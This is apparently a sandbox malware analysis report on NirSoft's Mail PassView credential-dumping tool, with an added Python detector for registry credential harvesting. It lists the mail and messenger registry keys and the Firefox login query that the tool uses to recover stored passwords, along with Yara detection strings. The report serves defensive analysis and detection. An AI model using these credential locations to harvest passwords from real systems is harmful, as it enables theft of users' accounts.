Windows Analysis Report
SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe

Overview

General Information

Sample name: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
Analysis ID: 1446234
MD5: a878dd0345c3721d93791ab68fcc1faf
SHA1: 4982b21603e872f148b8ff1f9336dbd448d6abb5
SHA256: 8458cddbadb39ca77e624b8dc5f28db74d14b03f0e573bb97dce2ebd5f2e6f05
Tags: exe

Detection

MailPassView
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected MailPassView
Machine Learning detection for sample
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
No configs have been found
Yara matches on the sample file
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
• Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
• Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Description: Detects BabyShark KimJongRAT | Author: Florian Roth | Strings:
  0x131b0: $a1: logins.json
  0x13110: $s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  0x13934: $s4: \mozsqlite3.dll
  0x121a4: $s5: SMTP Password

Yara matches in memory dumps
Source: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: 00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
Source: Process Memory Space: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe PID: 5320 | Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security

Yara matches on unpacked PE files
Source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack
• Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
• Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Description: Detects BabyShark KimJongRAT | Author: Florian Roth | Strings:
  0x131b0: $a1: logins.json
  0x13110: $s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  0x13934: $s4: \mozsqlite3.dll
  0x121a4: $s5: SMTP Password
Source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack
• Rule: JoeSecurity_MailPassView | Description: Yara detected MailPassView | Author: Joe Security
• Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Description: Detects BabyShark KimJongRAT | Author: Florian Roth | Strings:
  0x131b0: $a1: logins.json
  0x13110: $s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  0x13934: $s4: \mozsqlite3.dll
  0x121a4: $s5: SMTP Password
                No Sigma rule has matched
                No Snort rule has matched

                AV Detection

Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | ReversingLabs: Detection: 76%
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb | source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_0040702D: FindFirstFileA, FindNextFileA, strlen, strlen
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, 00000000.00000002.2791480565.000000000019B000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | String found in binary or memory: http://www.nirsoft.net/
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_0040ADA4: GetTempPathA, GetWindowsDirectoryA, GetTempFileNameA, OpenClipboard, GetLastError, DeleteFileA
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00406073: EmptyClipboard, strlen, GlobalAlloc, GlobalLock, memcpy, GlobalUnlock, SetClipboardData, CloseClipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00405FD0: EmptyClipboard, GetFileSize, GlobalAlloc, GlobalLock, ReadFile, GlobalUnlock, SetClipboardData, GetLastError, CloseHandle, GetLastError, CloseClipboard

                System Summary

Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLE | Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
Source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
Source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: 0_2_00404DE5
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: 0_2_00404E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: 0_2_00404EC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: 0_2_00404F58
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: 0_2_0040BF6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function: String function 00412084 appears 39 times
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 (date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/)
Source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 (date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/)
Source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 (date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/)
Source: classification engine | Classification label: mal80.phis.spyw.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_0040F37C: FindResourceA, SizeofResource, LoadResource, LockResource
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | File opened: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.cfg
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_CURSOR
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_BITMAP
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_ICON
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_MENU
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_DIALOG
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_STRING
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_ACCELERATOR
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: section name: RT_GROUP_ICON
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb | source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00403C17: LoadLibraryA, GetProcAddress, strcpy
Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Static PE information: real checksum: 0x20c22 should be: 0x1c68c
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00412341: push ecx; ret 0_2_00412351
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00412360: push eax; ret 0_2_00412374
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00412360: push eax; ret 0_2_0041239C
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_0040FCBC: memset, strcpy, memset, strcpy, strcat, strcpy, strcat, strcpy, strcat, GetModuleHandleA, LoadLibraryExA, GetModuleHandleA, LoadLibraryA, GetProcAddress (10 times)
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Window / User API: foregroundWindowGot 367
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_0040702D: FindFirstFileA, FindNextFileA, strlen, strlen
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00403C17: LoadLibraryA, GetProcAddress, strcpy
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_004073B6: memset, memset, memset, memset, GetComputerNameA, GetUserNameA, MultiByteToWideChar, MultiByteToWideChar, MultiByteToWideChar, strlen, strlen, memcpy
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00406282: GetVersionExA

                Stealing of Sensitive Information

Source: Yara match | File source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLE
Source: Yara match | File source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe PID: 5320, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00402D74: strcpy, strcpy, strcpy, strcpy, RegCloseKey, PopPassword
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_00402D74: strcpy, strcpy, strcpy, strcpy, RegCloseKey, SMTPPassword
Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | Code function 0_2_004033B1: ESMTPPassword
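The registry keys listed above are the per-client account stores that a mail password recovery tool walks in sequence; a single process opening several of them within seconds is the behaviour worth alerting on, independent of whether the file hash or the Yara hit is known. The BabyShark/KimJongRAT rule fired on four strings (logins.json, the moz_login query, \mozsqlite3.dll, "SMTP Password") that describe credential stores rather than anything RAT-specific, so the Yara match on its own is a "credential dumper" signal, not attribution. The Python below is an added example, not part of the Joe Sandbox report and not NirSoft code: it replays constructed registry-access events in a text format invented for this example (not a vendor schema) and flags a process that opens two or more of the listed stores inside a short window. The process names in the sample events and the allowlist are assumptions.

```python
"""Flag a process that walks several mail-client credential stores in the
registry, the behaviour the report records under "Key opened".

Added example, not part of the Joe Sandbox report and not NirSoft code. The
event lines are constructed for this example in a made-up text format, not a
vendor schema; the process names are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Account-store keys taken verbatim from the report's "Key opened" lines (all under HKCU).
MAIL_CREDENTIAL_KEYS = (
    r"Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"Software\IncrediMail\Identities",
    r"Software\Microsoft\Windows Live Mail",
    r"Software\Google\Google Talk\Accounts",
)

# Mail clients that legitimately read their own store (assumed names; tune per environment).
ALLOWLIST = {"outlook.exe", "wlmail.exe"}

EVENT_RE = re.compile(r"^(\S+) pid=(\d+) image=(.+?) op=(\w+) key=(.+)$")


def normalize_key(path):
    """Drop the hive prefix and lowercase, so HKCU\... and HKEY_CURRENT_USER\... compare equal."""
    path = re.sub(r"^(HKEY_CURRENT_USER|HKCU|HKEY_USERS\\S-[0-9-]+)\\", "", path, flags=re.I)
    return path.lower()


def is_mail_credential_key(path):
    p = normalize_key(path)
    return any(p == k.lower() or p.startswith(k.lower() + "\\") for k in MAIL_CREDENTIAL_KEYS)


def parse_event(line):
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, pid, image, op, key = m.groups()
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid), "image": image, "op": op, "key": key}


def find_harvesters(lines, min_distinct=2, window=timedelta(seconds=30)):
    """Alert when one process opens at least min_distinct distinct stores within `window`."""
    hits = defaultdict(list)                        # (pid, image) -> [(ts, store)]
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["op"] != "RegOpenKey" or not is_mail_credential_key(ev["key"]):
            continue
        hits[(ev["pid"], ev["image"].lower())].append((ev["ts"], normalize_key(ev["key"])))
    alerts = []
    for (pid, image), events in hits.items():
        if image.rsplit("\\", 1)[-1] in ALLOWLIST:  # name-based allowlist: weak, see note below
            continue
        events.sort()
        for i, (t0, _) in enumerate(events):        # sliding window starting at each hit
            stores = {store for ts, store in events[i:] if ts - t0 <= window}
            if len(stores) >= min_distinct:
                alerts.append({"pid": pid, "image": image, "stores": sorted(stores)})
                break
    return alerts


# Constructed events: a mailpv-style process sweeping three stores, Outlook reading its own
# store, and explorer.exe touching one store much later.
SAMPLE_EVENTS = [
    r"2024-05-23T01:31:02 pid=5320 image=C:\Users\user\Desktop\mailpv.exe op=RegOpenKey key=HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"2024-05-23T01:31:02 pid=5320 image=C:\Users\user\Desktop\mailpv.exe op=RegOpenKey key=HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"2024-05-23T01:31:03 pid=5320 image=C:\Users\user\Desktop\mailpv.exe op=RegOpenKey key=HKCU\Software\IncrediMail\Identities",
    r"2024-05-23T01:31:05 pid=4100 image=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE op=RegOpenKey key=HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"2024-05-23T01:31:09 pid=7788 image=C:\Windows\explorer.exe op=RegOpenKey key=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer",
    r"2024-05-23T01:40:00 pid=7788 image=C:\Windows\explorer.exe op=RegOpenKey key=HKCU\Software\Microsoft\Windows Live Mail",
]

if __name__ == "__main__":
    for alert in find_harvesters(SAMPLE_EVENTS):
        print("pid %d %s opened %d mail credential stores: %s"
              % (alert["pid"], alert["image"], len(alert["stores"]), ", ".join(alert["stores"])))
```

Two caveats for deploying this. Sysmon does not record key opens (its registry events cover key creation and deletion, value writes and renames), so the input has to come from SACL-based object access auditing on these keys (Security event 4663) or from EDR telemetry. And an allowlist keyed on image name is trivially bypassed by renaming; in production, key it on signer or full path and keep the threshold low, since a legitimate client reads its own store, not four others.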
MITRE ATT&CK matrix. Only techniques with at least one matching signature are listed; the number in parentheses is the count of matching signatures shown in the report's matrix cell.

Execution:
• Native API (1)
Persistence:
• DLL Side-Loading (1)
Privilege Escalation:
• DLL Side-Loading (1)
Defense Evasion:
• Deobfuscate/Decode Files or Information (1)
• Obfuscated Files or Information (2)
• DLL Side-Loading (1)
Credential Access:
• Credentials in Registry (2)
• Credentials In Files (1)
Discovery:
• Application Window Discovery (1)
• Account Discovery (1)
• System Owner/User Discovery (1)
• File and Directory Discovery (1)
• System Information Discovery (3)
Collection:
• Email Collection (1)
• Archive Collected Data (1)
• Clipboard Data (2)
Command and Control:
• Encrypted Channel (1)

No matches under Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration or Impact.
Antivirus, machine learning and genetic malware detection

Initial sample
Source | Detection | Scanner | Label
SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | 76% | ReversingLabs | Win32.Hacktool.MailPassView
SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
http://www.nirsoft.net | 0% | Avira URL Cloud | safe

Contacted domains: No contacted domains info

URLs found in binary or memory
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.nirsoft.net | SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, 00000000.00000002.2791480565.000000000019B000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe | false | Avira URL Cloud: safe | unknown

Contacted IPs: No contacted IP infos
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446234
Start date and time: 2024-05-23 01:30:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
Detection: MAL
Classification: mal80.phis.spyw.winEXE@1/0@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 39
• Number of non-executed functions: 134
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
No simulations
No context (IPs, domains, ASNs, JA3 fingerprints, dropped files)
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.292490303895851
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
File size: 102'400 bytes
MD5: a878dd0345c3721d93791ab68fcc1faf
SHA1: 4982b21603e872f148b8ff1f9336dbd448d6abb5
SHA256: 8458cddbadb39ca77e624b8dc5f28db74d14b03f0e573bb97dce2ebd5f2e6f05
SHA512: 12900cd5dbf9e3627abc5496e288b8e3c6ef4859c716734382dcc29e819707a46f1b4bc7c569f5d8fff56c6655be0e6930d6926f97f9fa4ec7ccca864876321d
SSDEEP: 1536:dkSw2tYZT/E7mKr1awGUpi2joqDm1WHUZ1Kj4I9eF/6n9w2KQf:dk52tYtEyKB5GUDlDdccMU9w2KQf
TLSH: 2EA36C03B2905472E5EE063179662FB5DAF9BE311A349E0BD7A05D0B3DB06C4EE21397
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qq..Qq..Qq...~..Cq...R..Rq...R..Zq..Qq..[p...R..Rq..v...vq..v...Pq..v...Pq..RichQq..................PE..L.....oW...........
Icon Hash: 231323c2b0bac892
Entrypoint: 0x41211a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: (none; no DYNAMIC_BASE or NX_COMPAT flag is set, so the image is neither ASLR- nor DEP-opted-in, consistent with RELOCS_STRIPPED and a fixed 0x400000 base)
Time Stamp: 0x576FA4D7 [Sun Jun 26 09:48:07 2016 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f62295e96de1ceba9dea2c107634303d
Entrypoint preview (instruction listing):
                push 00000070h
                push 004133E0h
                call 00007F8FA15A4607h
                xor ebx, ebx
                push ebx
                mov edi, dword ptr [00413068h]
                call edi
                cmp word ptr [eax], 5A4Dh
                jne 00007F8FA15A4441h
                mov ecx, dword ptr [eax+3Ch]
                add ecx, eax
                cmp dword ptr [ecx], 00004550h
                jne 00007F8FA15A4434h
                movzx eax, word ptr [ecx+18h]
                cmp eax, 0000010Bh
                je 00007F8FA15A4441h
                cmp eax, 0000020Bh
                je 00007F8FA15A4427h
                mov dword ptr [ebp-1Ch], ebx
                jmp 00007F8FA15A4449h
                cmp dword ptr [ecx+00000084h], 0Eh
                jbe 00007F8FA15A4414h
                xor eax, eax
                cmp dword ptr [ecx+000000F8h], ebx
                jmp 00007F8FA15A4430h
                cmp dword ptr [ecx+74h], 0Eh
                jbe 00007F8FA15A4404h
                xor eax, eax
                cmp dword ptr [ecx+000000E8h], ebx
                setne al
                mov dword ptr [ebp-1Ch], eax
                mov dword ptr [ebp-04h], ebx
                push 00000002h
                call dword ptr [00413374h]
                pop ecx
                or dword ptr [00418B6Ch], FFFFFFFFh
                or dword ptr [00418B70h], FFFFFFFFh
                call dword ptr [00413370h]
                mov ecx, dword ptr [00417B8Ch]
                mov dword ptr [eax], ecx
                call dword ptr [0041336Ch]
                mov ecx, dword ptr [00417B88h]
                mov dword ptr [eax], ecx
                mov eax, dword ptr [0041333Ch]
                mov eax, dword ptr [eax]
                mov dword ptr [00418B68h], eax
                call 00007F8FA15A455Fh
                cmp dword ptr [00417000h], ebx
                jne 00007F8FA15A442Eh
                push 00412304h
                call dword ptr [00413380h]
                pop ecx
                call 00007F8FA15A4534h
